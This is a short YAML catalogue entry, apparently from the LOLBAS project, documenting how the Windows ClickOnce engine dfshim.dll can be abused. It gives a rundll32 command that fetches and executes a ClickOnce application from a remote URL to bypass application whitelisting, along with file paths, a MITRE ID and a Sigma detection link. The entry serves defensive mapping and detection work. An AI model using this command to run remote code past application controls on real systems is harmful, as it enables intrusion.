---
Name: Dfshim.dll
Description: ClickOnce engine in Windows used by .NET
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
    Description: Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)
    Usecase: Use binary to bypass Application whitelisting
    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.002
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: ClickOnce
      - Execute: Remote
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
Resources:
  - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
  - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
